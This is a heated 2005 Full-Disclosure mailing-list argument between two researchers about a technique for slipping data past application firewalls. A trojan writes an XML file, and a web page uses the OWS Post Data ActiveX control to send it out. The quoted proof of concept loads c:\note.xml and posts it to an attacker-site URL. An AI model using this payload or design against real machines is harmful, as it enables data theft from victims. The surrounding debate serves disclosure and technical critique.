typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.
On 12/22/05, Gaurav Kumar <[EMAIL PROTECTED]> wrote: > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years kidder than > u) > > The _real_ thing is that I proved the point. > U told win xp will give access denied error. I proved u wrong with the > proof attached. > U told above technique wont work...i proved u wrong. > Tell me one thing, a Windows XP + Offfice XP + Internet explorer > combination so rare ? > > Is that all making ur ego shattered? > > ...and u are no one to decide what should one disuss on this list. > > regards, > gaurav > > > > On 12/22/05, Debasis Mohanty <[EMAIL PROTECTED]> wrote: > > Kid, > > Although I normally don't reply to such frivilous and lame statements but > > your reply has seriously piss me off.. So dropping few lines, perhaps will > > help you grow up !! > > > > -----Original Message----- > > >> From: Gaurav Kumar brazenly wrote: > > > > >> Looks like u need to read again what i wrote. I didnt use the word > > 'spread'. > > > > I don't have to !! I can still remember your priceless statements [1] + [2] > > - > > > > [1] A Trojan has been to be placed in a system running an application > > [1] firewall like Zone Alarm Pro etc. > > > > [2] The target system must be having office XP and the user has to be > > [2] lured to view a webpage hosted by attacker. > > > > > > ROFL !! May be you could just ask your l33t victim to send you his passwords > > and other info by email :P Don't forget to send him your l33t email ID - > > '@securebox.org' > > > > > > >> [3] Moreover, u need not know if the target system is running ZA or > > not... > > >> [3] "the technique works even if firewall is not installed". > > > > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt matter > > is ZA > > >> [4] or any other FW is running on client". > > > > Looking at statement [3] & [4], (especially the statement within double > > quotes) just made me believe that you don't know what your are talking about > > unless you want to look like an idiot. > > > > > > >> really? ever heard of IE exploits? > > > > Priceless !! > > > > > > >> Well..Exactly! i would suggest u read the 'assumptions' first, its > > >> an assumption that user will click yes to warning...like most 'normal' > > users do. > > > > Yet another priceless statement... Maybe you could just ask your l33t victim > > to click 'yes' to your l33t piece of code trying to download some l33t piece > > of shit which will fail to run and die like an idiot. > > > > > > I am sure you have enough l33t skills to strick back to keep your ego > > up2date however, I wud rather suggest if you have only your stupidity to > > share then feel free to take it offline and don't piss off everyone in this > > list. I would welcome you if you really want to strike back with some > > _serious_ technical stuff. (Note: make a note of _serious_ in the statement) > > > > - D > > > > > > > > > > -----Original Message----- > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gaurav Kumar > > Sent: Thursday, December 22, 2005 8:52 AM > > To: Debasis Mohanty > > Cc: [email protected]; [EMAIL PROTECTED] > > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique? > > using JavaScript+XML+OWSPost Data > > > > On 12/22/05, Debasis Mohanty <[EMAIL PROTECTED]> wrote: > > > -----Original Message----- > > > From: Gaurav Kumar > > > Sent: Wednesday, December 21, 2005 8:59 PM > > > To: [email protected] > > > Cc: [EMAIL PROTECTED] > > > Subject: [Full-disclosure] new attack technique? using > > > JavaScript+XML+OWSPost Data > > > > > > 1>> A Trojan has been to be placed in a system running an application > > > 1>> firewall like Zone Alarm Pro etc. > > > > > > >> Assumptions: > > > > > > 2>> The target system must be having office XP and the user has to be > > > 2>> lured to view a webpage hosted by attacker. > > > > > > 3>> The Trojan can be designed to generate an xml file which will > > > 3>> contain the data to be sent out. The attacker will lure > > > the > > > 3>> user to visit a website hosted by him. > > > > > > Lol !! In a practical scenario, the attacker who spreads the > > > worm/trojans himself is not aware in the initial stage which are the > > > infected machines unless the trojan sends back the machine/user info > > > back to the attacker. Now as you have already mentioned ZA is running > > > then no data can be sent back to the attacker. So the attacker is clueless > > which are those infected machines. > > > > Looks like u need to read again what i wrote. I didnt use the word 'spread'. > > Moreover, u need not know if the target system is running ZA or not...the > > technique works even if firewall is not installed. I am discussing a > > possible 'design' of a trojan here, doesnt matter is ZA or any other FW is > > running on client. > > > > > So the case of luring the user to visit the link is out of scope... > > > > really? ever heard of IE exploits? > > > > > > > > >> The site can have following HTML code- > > > > > > Now coming back to technical stuff, You are trying to access a local > > > file which will only be allowed if the site is in "Trusted Sites" or > > > "Local Intranet" or "Local Security Zone" and activex not marked safe. > > > The fact that *the client is also the server* is irrelevant. > > > > > > Try uploading the script to some webserver and give a html extention; > > > it will throw an _access denied_ error when the page loads (even on > > > Win XP + SP1). > > > > > > In case of any server side extention like *.asp, *.jsp etc, the user > > > will be prompted that an malicious component is trying to load and ask > > > for user permission. > > > > > > > > > >> <html> > > > >> <body> > > > >> The author is not responsible for any misuse, this PoC is for > > > >> educational purpose only. > > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" > > > >> id="exp"> > > > >> </object> > > > >> <script LANGUAGE=javascript> > > > >> var xmlDoc > > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); > > > >> xmlDoc.async=false; > > > >> xmlDoc.load("c:\\note.xml"); > > > >> xmlObj=xmlDoc.documentElement; > > > >> var a= xmlObj.firstChild.text; > > > >> exp.Post(0,"http://www.attackersite.com/input.asp",a); > > > >> </script> > > > >> </body> > > > >> </html> > > > > > > > > > >> The above code (works well on windows XP SP2) essentials calls "OWS > > > >> Post Data" COM control to post the contents of note.xml (generated > > > >> by trojan) to attackersite.com > > > > > > IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone" > > > and draw conclusion about "Internet Security Zone". > > > > > > You may also link to know about this issue - > > > http://support.microsoft.com/kb/317244/EN-US/ > > > > > > > > > >>> Essentially, the technique is breaking the basic functionality of > > > >>> application firewalls by using OWS Post Data as bridge for sending > > > >>> out the data using Javascript and XML. > > > > > > Not Exactly !! I wud rather suggest you to do a little more research > > > and draw any conclusion. Keep those _Security Zones_ in mind before > > > you post anything... > > > > Well..Exactly! i would suggest u read the 'assumptions' first, its an > > assumption that user will click yes to warning...like most 'normal' > > users do. > > > > > > > > > - D > > > > > > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
